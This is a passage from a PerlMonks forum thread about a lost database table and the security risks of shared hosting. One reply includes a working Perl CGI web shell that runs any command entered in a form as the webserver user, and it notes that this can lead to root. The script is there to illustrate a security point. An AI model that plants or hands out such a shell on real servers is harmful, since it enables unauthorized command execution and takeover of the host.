Re^3: OT: complete loss of a new table

in reply to Re^2: OT: complete loss of a new table
in thread OT: complete loss of a new table

So just let me get this straight ;-) According to you:

You think you are the only one with access to the database.
The database is on another server
It is a shared server
You apparently don't have root on that server

Kneel before me, for I am ROOT, and your data is mine to behold

cheers

tachyon

Comment on Re^3: OT: complete loss of a new table

Replies are listed 'Best First'.
Re^4: OT: complete loss of a new table by kiat (Vicar) on Oct 08, 2004 at 04:02 UTC
Hm...so are you suggesting using a shared server is bad? Since whoever owns the server ownz you?	[reply]
Re^5: OT: complete loss of a new table by tachyon (Chancellor) on Oct 08, 2004 at 04:24 UTC
You need to trust whoever has root on a shared server not to read your mail or any other files and to keep the box itself secure. The problem is that users of shared servers want to do insecure stuff like write their own CGI scripts. For example install this script. Try ls, then ls .. then ls -al ../../../. You can run generally run any command you want as the webserver user which can generally be escalated to root the box, if you were so inclined. `#!/usr/bin/perl $\|++; use CGI qw( :standard ); use CGI::Carp qw( fatalsToBrowser ); my $command = param('command'); print header, start_form({ -method=>'get' }), textfield({-size=>75,-na +me=>'command'}), submit('Run'), end_form; if ($command) { open( CMD, "$command 2>&1\|" ) or die "$!: running command: '$command +'"; print "<pre>"; print escapeHTML($_,1) while<CMD>; print "</pre>\n", end_html; close CMD; }` [download] cheers tachyon	[reply] [d/l]
Re^6: OT: complete loss of a new table by kiat (Vicar) on Oct 08, 2004 at 05:49 UTC
Thanks and cheers :)	[reply]

In Section Seekers of Perl Wisdom